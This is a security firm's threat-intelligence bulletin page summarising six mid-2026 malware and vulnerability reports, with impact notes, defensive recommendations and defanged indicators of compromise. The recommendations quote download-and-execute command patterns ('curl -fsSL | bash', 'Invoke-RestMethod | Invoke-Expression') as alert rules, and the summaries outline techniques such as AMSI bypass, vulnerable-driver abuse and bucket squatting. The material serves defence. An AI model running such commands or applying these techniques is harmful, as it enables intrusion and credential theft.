Get SRA’s free report: The Purple Perspective 2026

TIGR Threat Watch

Threat Watch Feed

🚩 – IOCs Added

The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.

🚩 GlassWASM hides malware inside VS Code extensions and uses the Solana blockchain as a resilient command-and-control platform.

Jun 17, 2026

Socket researchers discovered a new malware family dubbed GlassWASM embedded within trojanized Visual Studio Code extensions distributed through the Open VSX marketplace. The malicious extensions impersonated legitimate projects by copying publisher names, version numbers, repository links, and descriptions from trusted extensions while secretly embedding a TinyGo-compiled WebAssembly payload. Once installed, the extensions automatically executed a heavily obfuscated .wasm module that contained no plaintext URLs, domains, commands, or network indicators. Instead, all operational strings were encrypted using ChaCha20 and reconstructed only at runtime, making traditional signature-based detection significantly more difficult. Researchers linked the campaign with medium confidence to the GlassWorm threat actor due to similarities in infrastructure, tradecraft, and command-and-control techniques.

Rather than relying on traditional infrastructure, GlassWASM retrieves attacker instructions from the Solana blockchain. The malware queries public Solana RPC services, monitors transactions associated with an attacker-controlled wallet, extracts command-and-control information from SPL Memo transactions, and dynamically builds platform-specific payload execution commands. Depending on the victim’s operating system, GlassWASM launches commands that download and execute second-stage malware directly in memory using curl | bash on Linux and macOS or Invoke-RestMethod | Invoke-Expression on Windows. By leveraging public blockchain infrastructure as a dead-drop resolver, attackers can rapidly rotate infrastructure without modifying the malware itself, significantly increasing operational resilience and complicating takedown efforts.

Impact: Successful compromise can provide attackers with arbitrary code execution capabilities and enable delivery of additional malware, credential theft tools, cryptocurrency-focused payloads, or developer environment compromises. Because the campaign abuses trusted development tools, legitimate blockchain infrastructure, WebAssembly binaries, and dynamically resolved command-and-control channels, detection and response efforts become significantly more challenging. Organizations with software developers using Open VSX-based editors such as Cursor, Windsurf, Gitpod, and VSCodium may face elevated risk.

Recommendation:

  • Review development environments for installation of ExarGD.vsblack@0.0.1 and noellee-doc.flint-debug@0.1.1 from the Open VSX marketplace.
  • Remove identified malicious extensions and investigate any systems where the extensions were activated.
  • Treat systems that executed the malicious extensions as potentially compromised and perform incident response investigations.
  • Monitor for Node.js processes spawning PowerShell, bash, curl, sh, or other script interpreters.
  • Alert on command lines containing curl -fsSL | bashInvoke-RestMethod | Invoke-Expression, or similar download-and-execute patterns.
  • Monitor for unexpected outbound connections from development workstations to Solana RPC infrastructure, particularly requests using getSignaturesForAddress and getTransaction.
  • Investigate references to the Solana wallet 6ExrZayPZzMMSnszc42cH81DpuKT8FhCX9H6Sesn6rpz within logs, memory, network traffic, or endpoint telemetry.
  • Review software supply chain controls for Open VSX, VSCodium, Cursor, Windsurf, Gitpod, and other VS Code derivative platforms.
  • Implement scanning and analysis procedures for WebAssembly (.wasm) files introduced into development environments and package repositories.
  • Rotate developer credentials, cloud credentials, CI/CD tokens, and package repository secrets for systems potentially exposed to the malware.
  • Monitor for communications to dodod[.]lat and investigate connections to URLs following the /darwin/i/_/linux/i/_, and /win32/i/_ patterns.

🚩 ClickFix intrusion chains Potemkin, RMMProject, EtherRAT, and Cloudflare tunnels into full network compromise.

Jun 17, 2026

Huntress documented a sophisticated intrusion that began with a ClickFix social engineering attack and ultimately resulted in compromise of more than 11 systems across a victim network. The attack started when a user executed a malicious command from a fake troubleshooting prompt, launching an HTA payload that installed a previously undocumented malware loader dubbed Potemkin. Potemkin uses a deterministic domain generation algorithm (DGA), custom encryption routines, and reflective DLL loading to retrieve and execute follow-on payloads entirely in memory. The primary payload delivered through Potemkin was RMMProject, a Lua-based remote access framework capable of credential theft, process injection, browser compromise, remote desktop control, and dynamic module loading.

The attackers later deployed EtherRAT, a Node.js-based backdoor that resolves its command-and-control infrastructure through the Ethereum blockchain, alongside a renamed Cloudflare tunnel to establish persistent remote access. After gaining administrative credentials, the operators conducted hands-on-keyboard activity using WinRM, WMIExec, SMBExec, Chisel reverse SOCKS tunnels, PowerShell reverse shells, and multiple attempts to disable Microsoft Defender through registry modifications, service manipulation, AMSI bypasses, and exclusion path abuse. The campaign culminated in widespread lateral movement, deployment of EtherRAT across multiple hosts, and compromise of a domain controller. Huntress highlighted that the intrusion succeeded largely because the initial infected endpoint lacked monitoring, allowing attackers several hours of unrestricted access before detection controls were deployed.

Impact: Successful compromise enables credential theft, browser session hijacking, hidden remote desktop access, process injection, arbitrary code execution, lateral movement, persistence through scheduled tasks and registry Run keys, and long-term attacker access through blockchain-resolved command-and-control channels. Organizations with gaps in endpoint visibility may face significantly increased risk of rapid network-wide compromise following a single ClickFix infection.

Recommendation:

  • Ensure endpoint detection and monitoring coverage is deployed across all workstations, servers, and privileged systems without exceptions.
  • Educate users on ClickFix-style social engineering techniques that instruct users to paste commands into the Windows Run dialog.
  • Consider disabling the Windows Run dialog (Win+R) through Group Policy where operationally feasible.
  • Monitor for execution of mshta.exepcalua.execonhost.exe --headless, and unexpected Node.js processes executing from user-writable directories.
  • Investigate registry Run key persistence entries such as WindowsHostEdgeUpdate, or similarly benign-looking values that launch script interpreters or Node.js executables.
  • Monitor for unauthorized use of Cloudflare Tunnel (cloudflared) and investigate renamed variants masquerading as legitimate Windows processes.
  • Alert on PowerShell attempts to disable Defender, modify AMSI functionality, create Defender exclusions, or stop security services.
  • Monitor for WMIExec, SMBExec, WinRM, Impacket-related activity, and unusual administrative authentication events across the environment.
  • Investigate creation of scheduled tasks with randomized names that execute PowerShell, MSI installers, or remote payloads.
  • Monitor for browser credential theft activity, unexpected browser process injection, and access to browser SQLite databases containing cookies or stored credentials.
  • Review network traffic for communications with identified infrastructure including 77.110.122[.]58213.165.41[.]26cl.distritovagas[.]comsonra.eutialyson[.]comanus-staylard[.]xyz, and resumeacceptable[.]com.
  • Conduct threat hunting for Potemkin, RMMProject, EtherRAT, Chisel tunnels, Cloudflare tunnels, and associated persistence artifacts across all endpoints.

Vertex AI SDK flaw enables cross-tenant model poisoning and remote code execution through bucket squatting attacks.

Jun 17, 2026

Unit 42 researchers disclosed a critical vulnerability in the Google Cloud Vertex AI Python SDK that could allow attackers to hijack machine learning model uploads and achieve remote code execution (RCE) without any access to the victim’s Google Cloud environment. The issue affected google-cloud-aiplatform SDK versions 1.139.0 and 1.140.0 and stemmed from the use of predictable default storage bucket names combined with missing ownership validation checks. By preemptively registering a bucket matching a victim’s expected Vertex AI staging bucket, an attacker could intercept model uploads, replace legitimate model artifacts with malicious versions, and ultimately execute code when the model was deployed. Google addressed the issue in versions 1.144.0 and 1.148.0, with the final ownership validation controls released on April 15, 2026.

The attack, dubbed “Pickle in the Middle,” leveraged Python pickle and Joblib deserialization behavior commonly used for machine learning models. Researchers demonstrated that attackers could use a bucket squatting technique to win a narrow race condition during model staging, replace uploaded model files with malicious payloads, and execute arbitrary code within Google-managed Vertex AI serving infrastructure. Successful exploitation enabled theft of service account tokens, access to model artifacts belonging to other deployments, visibility into BigQuery resources, cloud infrastructure reconnaissance, and potential lateral movement opportunities. Notably, exploitation required only knowledge of the victim’s Google Cloud project ID and did not require phishing, credential theft, or compromise of the victim’s cloud environment.

Impact: Successful exploitation could allow attackers to poison machine learning models, execute arbitrary code within Vertex AI serving environments, steal cloud credentials, access model artifacts from other deployments, enumerate cloud resources, and conduct follow-on attacks within affected environments. The vulnerability highlights how weaknesses in AI and ML supply chains can introduce significant risk even when core cloud infrastructure remains uncompromised.

Recommendation:

  • Upgrade the Vertex AI Python SDK to version 1.148.0 or later to ensure bucket ownership validation is enforced.
  • Identify and inventory all systems, applications, and CI/CD pipelines using google-cloud-aiplatform SDK versions 1.139.0 or 1.140.0.
  • Explicitly specify the staging_bucket parameter when using Vertex AI model upload functions rather than relying on automatically generated default buckets.
  • Review Google Cloud Storage bucket naming practices to ensure bucket ownership is validated before use.
  • Monitor Vertex AI model upload and deployment workflows for unexpected bucket locations, model replacement activity, or anomalous artifact modifications.
  • Audit Vertex AI service account activity for unusual token usage, unauthorized resource access, and abnormal API activity.
  • Review Cloud Logging and audit logs for unexpected access to model artifacts, BigQuery resources, or Google-managed tenant project resources.
  • Monitor for model uploads originating from unexpected storage buckets or projects outside approved cloud environments.
  • Implement controls to validate model integrity prior to deployment, including cryptographic signing, checksum verification, and artifact validation procedures.
  • Review machine learning workflows that rely on Python pickle or Joblib deserialization and evaluate safer serialization formats where possible.

🚩 NarwhalRAT Python-based malware campaign uses spear phishing and multi-stage loaders to deliver in-memory RAT targeting Korean users.

Jun 16, 2026

Genians disclosed an active malware campaign distributing NarwhalRAT, a Python-based remote access trojan delivered via spear phishing emails impersonating Microsoft security alerts. The campaign targets primarily Korean users and leverages ZIP attachments containing malicious LNK files that initiate a multi-stage infection chain using native Windows tools, batch scripts, and a Python runtime.

The attack relies on social engineering to prompt execution of a malicious shortcut, which launches obfuscated commands and downloads additional payloads using curl and PowerShell. A Python-based loader disguised as a .cat file is deployed and executed via a scheduled task, ultimately decrypting and launching an in-memory RAT using ctypes. The malware supports keylogging, screen capture, USB data collection, and remote command execution through a multi-C2 architecture that includes compromised websites and pCloud as a dead-drop resolver. Exploitation is confirmed in the wild as part of an active phishing campaign.

Impact: NarwhalRAT provides attackers with persistent remote access and extensive data collection capabilities, including credential and activity monitoring. Its fileless execution, use of legitimate tools, and encrypted multi-channel C2 design reduce detection likelihood and enable long-term stealthy operations. Organizations with users susceptible to phishing or lacking behavioral detection capabilities may face increased risk of data exfiltration and unauthorized system control.

Recommendation:

  • Block or monitor access to known malicious domains and IPs identified in the report, especially webhostingkorea[.]com, daehoat[.]com, and novel21[.]co[.]kr.
  • Detect and alert on execution chains involving LNK files launching cmd.exe, PowerShell, and curl.exe, particularly from user download or TEMP directories.
  • Monitor for creation of suspicious scheduled tasks such as “MicrosoftUserInterfacePicturesUpdateTackMachine” and frequent task execution intervals.
  • Identify abnormal use of Python interpreters in user environments, especially renamed binaries such as userscreen.exe executing non-standard file types.
  • Enable EDR telemetry to detect in-memory execution patterns, including RWX memory allocation and ctypes-based API calls from Python processes.
  • Inspect for creation of hidden directories such as %APPDATA%\naverwhale and unusual files in C:\Users\Public\AccountPictures.
  • Monitor outbound connections to cloud storage services such as pCloud that may be used as covert C2 channels.
  • Educate users on phishing risks, particularly emails impersonating account security alerts and encouraging attachment execution.
  • Restrict execution of scripts and binaries from user-writable directories and enforce application control policies where feasible.

🚩 ESET identifies new Windows variants of the SprySOCKS backdoor used by FishMonger to target government networks.

Jun 16, 2026

ESET disclosed the discovery of two previously undocumented Windows variants of the SprySOCKS backdoor, attributed with high confidence to the FishMonger cyberespionage group. The malware, previously known to target Linux systems, was observed in real-world activity against government organizations in Honduras, Taiwan, Thailand, and Pakistan, expanding the group’s cross-platform capabilities.

The malware operates as a full-featured backdoor with support for over 30 commands and multiple communication protocols including TCP, UDP, and WebSocket. The WIN_DRV variant introduces kernel-level capabilities to evade detection, including hiding processes, files, network activity, and enabling covert command delivery through traffic diversion on arbitrary TCP ports. ESET confirms this activity has occurred in the wild, though initial access methods remain unconfirmed and may involve exploitation of unpatched public-facing systems; there are also limited and unconfirmed indications of potential UEFI bootkit use.

Impact: This development increases the risk of stealthy, persistent compromise in targeted environments, particularly government networks. The use of kernel drivers for evasion and covert communication significantly reduces visibility for traditional detection tools and allows attackers to maintain long-term access, conduct surveillance, and exfiltrate data with minimal indicators.

Recommendation:

Organizations should review the source material and assess exposure. Recommendations include:

  • Patch and harden all public-facing applications and services to reduce the risk of initial access via known or misconfigured vulnerabilities.
  • Monitor for unusual scheduled tasks, print processor registrations, or registry modifications related to persistence mechanisms such as IFEO debugger keys or print spooler components.
  • Audit and restrict the use of kernel drivers, including implementing driver signing enforcement and monitoring for unauthorized driver loads.
  • Use endpoint detection and response tools to identify process injection techniques such as process doppelgänging and suspicious svchost.exe activity.
  • Monitor network traffic for anomalous patterns, including unexpected TCP, UDP, or WebSocket communications and use of nonstandard ports.
  • Inspect for signs of hidden network connections or discrepancies between system activity and standard tools such as netstat.
  • Ensure logging and alerting is enabled for firewall rule modifications and suspicious use of netsh commands.
  • Review systems for unauthorized file placements in directories such as %SystemRoot%\Fonts and print spooler paths.
  • Enforce least privilege and limit administrative access to reduce the impact of potential compromise.

🚩 DragonForce Uses Microsoft Teams TURN Relays to Hide C2 Traffic During Ransomware Intrusion

Jun 16, 2026

Symantec and Carbon Black reported a DragonForce ransomware intrusion against a major U.S. services firm where attackers hid command-and-control traffic inside Microsoft Teams relay infrastructure. The attackers used a custom Go-based RAT tracked as Backdoor.Turn, which obtains an anonymous Microsoft Teams visitor token from Skype-backed identity services, uses legitimate Microsoft TURN relay infrastructure for connection setup, and then establishes a QUIC session to the attacker-controlled C2 server. Symantec noted this is the first known malware observed abusing Microsoft Teams TURN relay infrastructure in this manner.

The attackers were present in the victim network for one to two months and likely gained access by exploiting an SQL or MSSQL server vulnerability or through access purchased from an access broker. After initial access, they deployed a malicious ZIP containing a legitimate VirtualBox/DbgView executable and a sideloaded malicious DLL, modified firewall and access settings, added users or groups, and used Bring Your Own Vulnerable Driver techniques to terminate security processes. The operation included exploitation of multiple vulnerable drivers, including Huawei’s HWAuidoOs2Ec.sys through a novel “Havoc Process Terminator” technique, plus wsftprm.sys, Gamedriverx64.sys, K7RKScan.sys, and the custom Abyss Worker driver masquerading as a Palo Alto driver.

Impact: Successful compromise can allow ransomware operators to maintain stealthy access, evade security tooling, perform reconnaissance, move laterally, steal credentials, exfiltrate data, and deploy ransomware. Backdoor.Turn is especially difficult to detect through standard network monitoring because visible traffic may appear to be legitimate Microsoft Teams relay traffic. The malware also supports command execution, process creation, network scanning, LDAP and Active Directory searches, credential-based lateral movement, and browser credential theft. The use of multiple vulnerable drivers and a custom malicious driver increases the risk that endpoint protection and response tools may be terminated before ransomware deployment.

Recommendation:

  • Monitor for unusual Microsoft Teams TURN relay usage from servers or endpoints that do not normally initiate Teams media relay traffic.
  • Correlate Teams relay connections with suspicious endpoint activity, including process injection, QUIC sessions, unusual child processes, or outbound connections to unknown infrastructure.
  • Monitor for downloads of TechSupV18Fix3.zip or other suspicious ZIP archives used for tool staging.
  • Hunt for DLL sideloading involving legitimate VirtualBox or DbgView executables loading suspicious vboxrt.dll files.
  • Review endpoints for malicious or suspicious driver loading, including HWAuidoOs2Ec.sys, wsftprm.sys, Gamedriverx64.sys, K7RKScan.sys, and Abyss Worker driver variants.
  • Enable vulnerable driver blocklists and enforce controls that prevent unsigned, abused, or known vulnerable drivers from loading.
  • Monitor for security process termination, AV killer tools, and kernel-level driver activity used to disable protection.
  • Review Windows firewall changes, newly added local users or groups, and LimitBlankPassword configuration changes.
  • Hunt for AD reconnaissance tools such as ADExplore and network scanners appearing shortly before ransomware activity.
  • Monitor for browser credential theft, LDAP queries, credential-based lateral movement, and internal network scanning after initial compromise.
  • Maintain offline or immutable backups and verify recovery readiness in case ransomware deployment follows stealthy post-compromise activity.

Sign up here!

To receive the TIGR Threat Watch email bulletin and critical vulnerability notifications, simply complete the form below.

 

Follow on Twitter

@SRA_ThreatWatch will keep you up to date with the most recent posts on your social media feed.

Subscribe to the RSS

Just copy and add this link to your RSS app and be notified immediately when new intel is posted.

How to use RSS

Following the RSS feed is easy. RSS can be added in your Outlook desktop app, and there are many free RSS readers available for your mobile device.

To follow using Outlook:

  • In Outlook, right-click the RSS Feeds folder and choose Add a New RSS Feed.
  • In the New RSS Feed dialog box, enter the URL of the RSS Feed: https://sra.io/category/tigr/feed

(click here for detailed instructions and additional options for Outlook)

Popular mobile RSS reader apps include:

  • Feedly
  • NewsBlur
  • RSS Reader
  • Inoreader

After installing your preferred RSS reader, you will be able to add this feed by entering the URL: https://sra.io/category/tigr/feed

Threat Bulletin Archive

See full archive here

About TIGR Threat Watch

Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.